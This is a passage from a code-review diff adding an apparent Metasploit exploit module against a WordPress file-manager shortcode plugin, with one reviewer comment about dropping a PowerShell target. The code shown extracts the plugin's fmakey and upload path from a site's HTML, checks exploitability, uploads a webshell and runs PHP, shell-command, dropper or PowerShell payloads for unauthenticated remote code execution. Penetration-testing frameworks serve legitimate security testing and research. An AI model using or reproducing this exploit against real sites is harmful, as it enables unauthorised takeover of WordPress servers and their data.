modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb

```diff
@@ -0,0 +1,319 @@
+      # 1. Get the fmakey information by searching for strings:
+      # /_fmakey: '1555ef603c',/ or /_fmakey:'1555ef603c',/ or /"fmakey":"1555ef603c",/
+      fmakey_match1 = res.body.match(/_fmakey:.*'.*',/)
+      fmakey_match2 = res.body.match(/"fmakey":".*",/)
+      return if fmakey_match1.nil? && fmakey_match2.nil?
+
+      if fmakey_match1
+        @wp_data['fmakey'] = fmakey_match1[0].split(',')[0].split(':')[1].tr('\'', '').strip
+      else
+        @wp_data['fmakey'] = fmakey_match2[0].split(',')[0].split(':')[1].tr('"', '').strip
+      end
+
+      # 2. Get the upload directory path information by searching for strings:
+      # /path: 'upload',/ or /path:'upload',/ or /"path":"upload",/
+      path_match1 = res.body.match(/path:.*'.*',/)
+      path_match2 = res.body.match(/"path":".*",/)
+      return if path_match1.nil? && path_match2.nil?
+
+      if path_match1
+        @wp_data['path'] = path_match1[0].split(',')[0].split(':')[1].tr('\'', '').strip
+      else
+        @wp_data['path'] = path_match2[0].split(',')[0].split(':')[1].tr('"', '').strip
+      end
+
+      # 3. Determine Wordpress baseurl
+      # search in html content for:
+      # <script src='http(s)://ip/<wp-base>/wp-content/plugins/file-manager-advanced-shortcode/js/shortcode.js?ver=6.2.2' id='fma-shortcode-js-js'></script>
+      # split off /wp-content and http(s)://ip part to determine the <wp-base> which can be empty.
+      baseurl_match = res.body.match(%r{src=.*wp-content/plugins/file-manager-advanced-shortcode/})
+      return if baseurl_match.nil?
+
+      @wp_data['baseurl'] = baseurl_match[0].split('/wp-content')[0].split('/')[3]
+    end
+  end
+
+  def check
+    return CheckCode::Safe('Server not online or not detected as WordPress.') unless wordpress_and_online?
+
+    check_fma_shortcode_plugin
+    return CheckCode::Safe("Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?
+
+    CheckCode::Appears("fmakey successfully retrieved: #{@wp_data['fmakey']}")
+  end
+
+  def exploit
+    # check if fmakey is already set from the check method otherwise try to find the key.
+    check_fma_shortcode_plugin unless datastore['AutoCheck']
+    fail_with(Failure::NotVulnerable, "Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?
+
+    fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed.") unless upload_webshell
+    register_file_for_cleanup(@webshell_name.to_s)
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :php
+      execute_php(payload.encoded)
+    when :unix_cmd, :windows_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper, :windows_dropper
+      execute_cmdstager({ linemax: target.opts['Space'] })
+    when :windows_powershell
```

Comment:
You should be able to remove this because of the ability to remove the powershell target.